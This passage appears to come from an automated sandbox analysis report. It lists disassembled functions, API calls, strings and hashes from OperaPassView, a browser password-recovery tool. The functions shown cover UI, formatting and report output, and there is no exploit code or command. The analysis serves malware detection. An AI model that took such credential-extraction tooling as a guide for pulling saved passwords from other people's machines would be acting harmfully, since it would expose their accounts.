                                        • Instruction Fuzzy Hash: 712199B290021C7ADB21AB55CC45EDA37BCEB48395F00447BF508B21D1D7799A84CBAD
                                        Function 0040A56D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf
                                        • String ID: %%0.%df
                                        • API String ID: 3473751417-763548558
                                        • Opcode ID: 409ba99a9c349413dd446bed548785d2e9acc1bad2a7b6cef97f0aa39dd2e5d3
                                        • Instruction ID: ef544523c3523588dc28845724cc64a82ff7bc47be5f9679bfabf1e8d80f0346
                                        • Opcode Fuzzy Hash: 409ba99a9c349413dd446bed548785d2e9acc1bad2a7b6cef97f0aa39dd2e5d3
                                        • Instruction Fuzzy Hash: BB314171800129ABDB20EF55CC85FEB7B7CEF49344F0404FAB509B2152D7359A54CBA9
                                        Function 00409C7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 00409C98
                                        • wcscpy.MSVCRT ref: 00409CA8
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AA3
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AAD
                                          • Part of subcall function 00403A94: _memicmp.MSVCRT ref: 00403AC8
                                        • wcscpy.MSVCRT ref: 00409CF7
                                        • wcscat.MSVCRT ref: 00409D02
                                        • memset.MSVCRT ref: 00409CDE
                                          • Part of subcall function 00403E91: GetWindowsDirectoryW.KERNEL32(004111C8,00000104,?,00409D37,?,?,00000000,00000208,00000000), ref: 00403EA7
                                          • Part of subcall function 00403E91: wcscpy.MSVCRT ref: 00403EB7
                                        • memset.MSVCRT ref: 00409D26
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,00000000), ref: 00409D41
                                        • wcscat.MSVCRT ref: 00409D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                        • String ID: \systemroot
                                        • API String ID: 4173585201-1821301763
                                        • Opcode ID: facde2b8f89db745d60bf330219db30c754c20a28cf1d712b41ee9f834ebd63e
                                        • Instruction ID: d16e859cce06c1c2d3dd9f39888d71990bc3494b1314dad374068df8eab53baa
                                        • Opcode Fuzzy Hash: facde2b8f89db745d60bf330219db30c754c20a28cf1d712b41ee9f834ebd63e
                                        • Instruction Fuzzy Hash: 6B21D7A290530869D620E7B28C8AEAB63ECDF04714F20457FF155B20C3FB7D9944879E
                                        Function 00404B56 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                        • String ID: 0$6
                                        • API String ID: 4066108131-3849865405
                                        • Opcode ID: da43833e401972e40bb050ca289079bb69a928caf2944b2870b10eb0a741d1a9
                                        • Instruction ID: ac8843e93e4834736a0d64f13e10506abd6307da66712888bb72bde914a3a568
                                        • Opcode Fuzzy Hash: da43833e401972e40bb050ca289079bb69a928caf2944b2870b10eb0a741d1a9
                                        • Instruction Fuzzy Hash: CD318FB2408345AFDB209F91D845A9BB7E8FFC4314F01493EFA48A2291D375D945CF9A
                                        Function 004022B7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004022D6
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004022E8
                                        • FreeLibrary.KERNEL32(00000000), ref: 004022FC
                                        • 6F551CD0.COMCTL32 ref: 0040230A
                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402327
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Library$AddressF551FreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 269827459-317687271
                                        • Opcode ID: 5e0be6fcd069c0de86451f3d07a72106bd430ef0109bf354b51bb24d89ff4816
                                        • Instruction ID: a8424b05ea2414d579705bc050e2bdef412539755436e16bd16116d1aed5ed42
                                        • Opcode Fuzzy Hash: 5e0be6fcd069c0de86451f3d07a72106bd430ef0109bf354b51bb24d89ff4816
                                        • Instruction Fuzzy Hash: A801D671710211EAD7115BF49DCDB6F7A9CEB84749B10023AE902F21C0DBBCC9019668
                                        Function 00405368 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403CB3: GetFileAttributesW.KERNELBASE(?,00405371,?,00405428,00000000,?,00000000,00000208), ref: 00403CB7
                                        • wcscpy.MSVCRT ref: 00405382
                                        • wcscpy.MSVCRT ref: 00405392
                                        • GetPrivateProfileIntW.KERNEL32(00410D78,rtl,00000000,00410B68), ref: 004053A3
                                          • Part of subcall function 00404F08: GetPrivateProfileStringW.KERNEL32(00410D78,?,0040C3F0,00410E08,?,00410B68), ref: 00404F24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl$xA
                                        • API String ID: 3176057301-3088672139
                                        • Opcode ID: bbf035c638bcee87d24ac4c102a85c0043e067a756daed89e911eff3e230b98a
                                        • Instruction ID: 8d6e5ffcfa0c930258885b20e10a4471abb56068015b67b023cc0f5f92e7e1d5
                                        • Opcode Fuzzy Hash: bbf035c638bcee87d24ac4c102a85c0043e067a756daed89e911eff3e230b98a
                                        • Instruction Fuzzy Hash: 7FF0F072FC831132D62036B65C03F6E2908CBD2B25F55853BBA04B61C6C7FD4885879D
                                        Function 00401A3A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: free$wcslen
                                        • String ID:
                                        • API String ID: 3592753638-3916222277
                                        • Opcode ID: 7e7a27ca5187d256414d2101c6a5a9f5acec834a3b123171e393923e73fb705c
                                        • Instruction ID: ea8e8bfc3689916eaf51f58325e240114e1aa07e795bf1a39d57aab077eb8cb1
                                        • Opcode Fuzzy Hash: 7e7a27ca5187d256414d2101c6a5a9f5acec834a3b123171e393923e73fb705c
                                        • Instruction Fuzzy Hash: 0C615A30C0520ADADF189FA5E4844EEB7B1FF04316F60847FE452B62A4EB396981CB59
                                        Function 004043C3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004043E4
                                        • _snwprintf.MSVCRT ref: 00404417
                                        • wcslen.MSVCRT ref: 00404423
                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040443B
                                        • wcslen.MSVCRT ref: 00404449
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040445C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$_snwprintfmemset
                                        • String ID: %s (%s)$m1@
                                        • API String ID: 3979103747-711742907
                                        • Opcode ID: 8131d3bc0ca6c2f79b51d761541b27c86472350e0654d01bf05fa02329cd5419
                                        • Instruction ID: bb86e644d6e989a92f7ca735dca76e8dba8552fc6dee4fa7a9c70cf9b9ee5f46
                                        • Opcode Fuzzy Hash: 8131d3bc0ca6c2f79b51d761541b27c86472350e0654d01bf05fa02329cd5419
                                        • Instruction Fuzzy Hash: 8E21A1B2800119BBCF21DF95CC45D8AB3B8FF44348F008476EA48AB142DB35EA098BD8
                                        Function 004038DB Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002), ref: 00403900
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 0040391E
                                        • wcslen.MSVCRT ref: 0040392B
                                        • wcscpy.MSVCRT ref: 0040393B
                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00403945
                                        • wcscpy.MSVCRT ref: 00403955
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2767993716-572158859
                                        • Opcode ID: 83da817a605f0bd99ceaa53d5b62a723178d7d847e4a1ec7c31fbbb8bba9ebd5
                                        • Instruction ID: 94c912f6bede647b569eff4abacb5c65d13614e4083452cda4a423de8bec5245
                                        • Opcode Fuzzy Hash: 83da817a605f0bd99ceaa53d5b62a723178d7d847e4a1ec7c31fbbb8bba9ebd5
                                        • Instruction Fuzzy Hash: FC01DFB2604114FFE7142B91DD86E9F7E2DDB04BA2F20443AF602B10D1DAB95F40D69C
                                        Function 004059C1 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057AE
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057BC
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057CD
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057E4
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057ED
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405A01
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00405A1D
                                        • memcpy.MSVCRT(?,004100D0,00000014), ref: 00405A42
                                        • memcpy.MSVCRT(?,004100BC,00000014,?,004100D0,00000014), ref: 00405A56
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405AD9
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00405AE3
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405B1B
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                          • Part of subcall function 004049DF: LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                          • Part of subcall function 004049DF: memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                          • Part of subcall function 004049DF: wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 004049DF: wcslen.MSVCRT ref: 00404A7E
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: ($d
                                        • API String ID: 1140211610-1915259565
                                        • Opcode ID: bb2dd997502557e4ea6453ce3f07b21e831ae601660291ae351286145656e55e
                                        • Instruction ID: 07a921f86305acd16be1410c6986a741abc6e3f005c63e1355abcfc0754c8aed
                                        • Opcode Fuzzy Hash: bb2dd997502557e4ea6453ce3f07b21e831ae601660291ae351286145656e55e
                                        • Instruction Fuzzy Hash: D0517B71601704AFD724DF29C486B5AB7F4EF88318F10852EE55ADB391DB74A840CF58
                                        Function 0040ABF1 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,00406A80,?,?), ref: 0040AC28
                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,00406A80,?,?), ref: 0040AC54
                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,00406A80,?,?), ref: 0040AC6E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: 06ec56c56974e0f7b4b17a579e4c19adefe5500bcad0353641c0b1dc6ae569c0
                                        • Instruction ID: 949250bbfba309cc53c0f365b6ccabbe992970ffb619da80f2e731b650733e80
                                        • Opcode Fuzzy Hash: 06ec56c56974e0f7b4b17a579e4c19adefe5500bcad0353641c0b1dc6ae569c0
                                        • Instruction Fuzzy Hash: 9D0100A2E5C320A7FA3120264C86F370204D7A3B55E66053BF982352C1A1BD09B3919F
                                        Function 004066C2 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        • wcscat.MSVCRT ref: 00406791
                                        • _snwprintf.MSVCRT ref: 004067B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileWrite_snwprintfwcscatwcslen
                                        • String ID: &nbsp;$0k@$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 2451617256-3478536308
                                        • Opcode ID: 136b0e92e8df6b911a7d2d8a739884600bb4179733ca5a60cb8aa89c77b888ba
                                        • Instruction ID: 50620785be2924b2e998c7c2aa8d4364f5b00dbc210d32587abc7bdc2f159a22
                                        • Opcode Fuzzy Hash: 136b0e92e8df6b911a7d2d8a739884600bb4179733ca5a60cb8aa89c77b888ba
                                        • Instruction Fuzzy Hash: 2631AB31900208EFDF04AF54C886EAE7BB5FF04324F1140AAE905BB1E2DB75AA51CB94
                                        Function 004049DF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                        • wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 00404ED1: memset.MSVCRT ref: 00404EE4
                                          • Part of subcall function 00404ED1: _itow.MSVCRT ref: 00404EF2
                                        • wcslen.MSVCRT ref: 00404A7E
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                        • LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                        • memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,004049ED,004020A6,OperaPassView), ref: 00404977
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004049ED,004020A6,OperaPassView), ref: 00404995
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049B3
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: strings
                                        • API String ID: 3166385802-3030018805
                                        • Opcode ID: d8d92a0686d4d5e456feee226b20097165a3bab79b44d90df67e3c631c95ba9f
                                        • Instruction ID: 978925850f83b905d2b4b89a252fc2e9f9ba3081ff0ab66842589351d55622ab
                                        • Opcode Fuzzy Hash: d8d92a0686d4d5e456feee226b20097165a3bab79b44d90df67e3c631c95ba9f
                                        • Instruction Fuzzy Hash: 42419AB5640101FFD714DB59FC90EA6B775EBC8309714823AEB06A72B1DB39A842CB5C
                                        Function 00405143 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00405168
                                        • GetDlgCtrlID.USER32(?), ref: 00405173
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040518A
                                        • memset.MSVCRT ref: 004051B1
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 004051C8
                                        • _wcsicmp.MSVCRT ref: 004051DA
                                          • Part of subcall function 00405019: memset.MSVCRT ref: 0040502C
                                          • Part of subcall function 00405019: _itow.MSVCRT ref: 0040503A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: 273f307894d1a901c29e0270ddd29645e9960e59c1c9ae06192218f37dbc375b
                                        • Instruction ID: 0296023046db152ed264b92cdfb5494974fd98eae8030e4ac07410237231dc78
                                        • Opcode Fuzzy Hash: 273f307894d1a901c29e0270ddd29645e9960e59c1c9ae06192218f37dbc375b
                                        • Instruction Fuzzy Hash: A211A372800119BAEB20EB91DC89AEF7BACEF04350F0040B6F518E6092EB745A44DB99
                                        Function 00403566 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040360E
                                        • GetDlgItem.USER32(?,000003E9), ref: 00403621
                                        • GetDlgItem.USER32(?,000003E9), ref: 00403636
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040364E
                                        • EndDialog.USER32(?,00000002), ref: 0040366A
                                        • EndDialog.USER32(?,00000001), ref: 0040367F
                                          • Part of subcall function 00403325: GetDlgItem.USER32(?,000003E9), ref: 00403332
                                          • Part of subcall function 00403325: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403347
                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00403697
                                        • SetDlgItemInt.USER32(0000009B,000003ED,?,00000000), ref: 004037A3
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Item$Dialog$MessageSend
                                        • String ID:
                                        • API String ID: 3975816621-0
                                        • Opcode ID: 26c85d0074bae9d10ab68ded3bf59835fabe5f402c7936a152d4b2f9fcfa4426
                                        • Instruction ID: 12236749957bbde37ae72390c5e53f70cf41314f2f2f6dfb3ec25344756da973
                                        • Opcode Fuzzy Hash: 26c85d0074bae9d10ab68ded3bf59835fabe5f402c7936a152d4b2f9fcfa4426
                                        • Instruction Fuzzy Hash: B361E470100A01BFDB31AF25C886A1ABBA8EF44315F00C53EF915A77E1D779EA91CB49
